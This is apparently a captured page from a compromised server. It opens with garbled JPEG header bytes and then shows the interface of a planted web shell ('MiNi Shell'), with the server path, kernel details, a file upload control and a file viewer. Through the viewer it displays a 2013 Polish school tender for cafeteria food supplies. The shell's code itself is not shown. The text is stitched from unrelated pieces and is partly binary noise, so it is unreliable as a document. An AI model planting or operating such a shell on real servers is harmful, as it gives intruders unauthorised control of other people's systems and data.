JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/41906-N-2013.html

<p class="kh_header"><b>Jarczów: Przedmiotem zamówienia jest  zakup i dostawa artykułów spożywczych do kuchni stołówki Zespołu Szkół Gimnazjalnych w Jarczowie.</b><br>
<b>Numer ogłoszenia: 41906 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Podstawowo-Gimnazjalnych w Jarczowie , ul. Szkolna 3, 22-664 Jarczów, woj. lubelskie, tel. 84 663 45 24, faks 84 663 45 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspjarczow.republika.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa utworzona przez JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest  zakup i dostawa artykułów spożywczych do kuchni stołówki Zespołu Szkół Gimnazjalnych w Jarczowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup i dostawa artykułów spożywczych do kuchni Zespołu Szkół Gimnazjalnych w Jarczowie. Wymagany przez zamawiającego termin wykonania zamówienia - od  1 marca 2013r.  - do 31 grudnia 2013 r. z wyłączeniem ferii świątecznych, wakacji letnich  oraz innych dni wolnych od zajęć lekcyjnych, gdzie dostawy nie będą realizowane. 
Ilości podane w załącznikach 1.1-1.7 są szacunkowe i mogą ulec zmianie. Dotyczy to zmniejszenia lub zwiększenia ilości zamawianego towaru do 20%. Z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego. Zamawiający dopuszcza składanie ofert równoważnych. Nazwy własne podane w załącznikach 1.1-do 1.7 (przyprawa: Knorr, Pudliszki i inne) zostały podane przez zamawiającego tylko przykładowo. Wykonawca może zaproponować produkt o innej nazwie pod warunkiem, że posiadać on będzie nie gorsze parametry oraz właściwości 

Przedmiot jest podzielony na części:

WĘDLINY, MIĘSO I DRÓB CPV- 15100000-9
Szacunkowe zapotrzebowanie na te produkty:
Kości schabowe 377 Kg, Mięso mielone 120 Kg, Mięso karkówka 335 Kg, Mięso schab 144 Kg, Kiełbasa cienka 235 Kg, Wędlina na kanapki 85 Kg,  Pieczeń drobiowa 96 Kg, Słonina 35 Kg,  Żeberka 130 Kg

WARZYWA, OWOCE CPV- 15300000-1
Szacunkowe zapotrzebowanie na te produkty:
Buraczki ćwikłowe 62 Kg
Cebula 220 Kg
Cytryny 38 Kg
Groch 16 Kg
Jabłka 372 Kg
Ogórki świeże 200 Kg
Ogórki kwaszone 160 Kg
Pomidory 240 Kg
Pieczarki 14 Kg
Rzodkiewka 17 pęczek
Marchewka 40 Kg
Kapusta kwaszona 290 Kg
Kapusta pekińska 190 Kg
Sałata zielona, lodowa 133 Szt
Szczypiorek 28 pęczek
Ziemniaki 4614 Kg
Kapusta biała, czerwona 28 Kg

NABIAŁ I JAJA CPV- 15500000-3,  03142500-3
Szacunkowe zapotrzebowanie na te produkty:
Mleko 262 Litry
Śmietana Piątnica lub równoważny 1177 Sztuki-opakowanie  (450g)
Ser żółty Edamski lub równoważny 19 Kg
Ser twaróg 27 Kg
Masło 755 Sztuki - opakowanie  (200g)
Jogurty Joguś, dannon lub równoważny 200 Sztuki - kubeczek (150ml)
Margaryna Bielska lub równoważny 200 Sztuki  (250g)
Jajka 2400 Sztuki
Serek biały pakowany Piatnica twój smak lub równoważny 65 Sztuki - pakowany (135g)

PIECZYWO CPV-  15810000-9
Szacunkowe zapotrzebowanie na te produkty:
Chleb 1514 sztuk

ARTYKUŁU OGÓLNOSPOŻYWCZE CPV-   15800000-6
Szacunkowe zapotrzebowanie na te produkty:
Rosołki drobiowe (bulion) Winiary lub równoważny 155 Sztuki- opakowanie (60gr)
Zupy w proszku (różne) Winiary , Amino lub równoważny 366 Sztuki -opakowanie  (57g)
Bułka tarta 85 Sztuki -opakowanie  (500g)
Buraczki słoik Dawtona lub równoważny 127 Sztuki -słoik (510gr)
Cukier kryształ 547 Kg
Cukier waniliowy Delecta lub równoważny 140 Sztuki-opakowanie (30g)
Cynamon 4 Sztuki- opakowanie (20gr)
Dżem Nutella lub równoważny 42 Sztuki opakowanie (280g)
Delikat przyprawa Knorr lub równoważny 20 Sztuki -opakowanie (75g)
Herbata ekspresowa 26 Sztuki 
(opak. po 100torebek)
Kucharek 236 Sztuki- opakowanie (200g)
Koncentrat pomidorowy (Frubex) lub równoważny 43 Sztuki -słoik (900ml)
Ketchup 20 Sztuki-opakowanie (500g)
Kakao Puchatek 7 Sztuki -opakowanie  (300g)
Kwasek cytrynowy 33 Sztuki-opakowanie (20g)
Przyprawy ziołowe Prymat lub równoważne 550 Sztuki-opakowanie (20g)
Magi przyprawa Winiary lub równoważne 17 Sztuki opakowanie (200g)
Groszek konserwowy 20 Sztuki opakowanie (420ml)
Majonez Winiary lub równoważny 30 Sztuki opakowanie (700ml)
Olej (Kujawski) lub równoważny 371 Litr
Ogórki konserwowe Piak lub równoważny 118 Słoik (1 litr)
Ryż długoziarnisty Edo lub równoważny 36 Kg
Syrop owocowy (Cymes) lub równoważny 530 Sztuki- opakowanie (430ml)
Sól Edo lub równoważny 91 Kg
Sosy w proszku Winary, Amino lub równoważny 246 Sztuki- opakowanie (38g)
Sałatka w słoikach (Frubex) lub równoważny 467 Sztuki opakowanie (900ml)
Kukurydza konserwowa 22 Sztuki opakowanie (340g netto-420ml)
Makaron krajanka Pol-Mak lub równoważny 314 Sztuki opakowanie (250g)
Mąka ziemniaczana Edo lub równoważny 54 Sztuki opakowanie (500g)
Makaron świderki Lubella lub równoważny 123 Sztuki opakowanie  (450g)
Płatki kukurydziane 220 Sztuki opakowanie (500g)
Kasza gryczana 32 Kg
Kasza jęczmienna średnia 53 Kg
Mąka zamojska 120 Kg
Kubuś sok owocowy  200 Sztuki

MROŻONKI CPV- 15896000-5
Szacunkowe zapotrzebowanie na te produkty:
Bukiet jarzyn (450 gr) 48  Sztuki
Marchewka   mrożona kostka  142 Sztuki-  opakowanie (450 gr)
Marchew z groszkiem (450 gr) 130 Sztuki
Mieszanka kompotowa skład- śliwka, truskawka, porzeczka 73 Kg
Zupy mrożone kalafiorowa 30 Sztuki (450g)
Pyzy z mięsem Nordis lub równoważny 139 Sztuki (worki po 900g)
Kostka rybna Mintaj 80 Kg
Placki ziemniaczane  MC CAIN  225 Sztuki (worki po 1500g)
Kotlet domowy 85 Worki (10 sztuk w worku)
Kotlet cordon-blue 176 Worki (8 sztuk w worku)
Filet rybny Czarniak Filet 67 Kg
Filet drobiowy 140 Kg
Udka 120 Kg
Włoszczyzna ) 26 Sztuki opak (450 g)
Zupa mrożona pieczarkowa 24 Sztuki- worki po (450g)
Udziec 240 Kg

GARMAŻERKA CPV- 15894300-4
Szacunkowe zapotrzebowanie na te produkty:
Gołąbki 75 Kg
Pierogi ruskie 470 Kg
Pierogi z kapusta 102 Kg
Kluski śląskie 31 Kg
Kluski leniwe 139 Kg
Naleśniki z serem 180 Kg
Krokiety 86 Kg
Kopytka 36 Kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.30.00.00-1, 15.50.00.00-3, 03.14.25.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.89.60.00-5, 15.89.43.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie zawarte w SIWZ zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie zawarte w SIWZ zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie zawarte w SIWZ zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie zawarte w SIWZ zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie zawarte w SIWZ zał. Nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W stosunku do osób fizycznych oświadczenia z art. 24 ust.1   ustawy.-zał-Nr 4 do SIWZ (osoby fizyczne)
Oświadczenie wykonawcy o częściach oferty - zał Nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarczow.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Podstawowo-Gimnazjalnych w Jarczowie ul. Szkolna 3, 22-664 Jarczów woj. lubelskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 09:00, miejsce: Urząd Gminy w Jarczowie ul. 3 Maja 24, 22-664 Jarczów woj. lubelskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com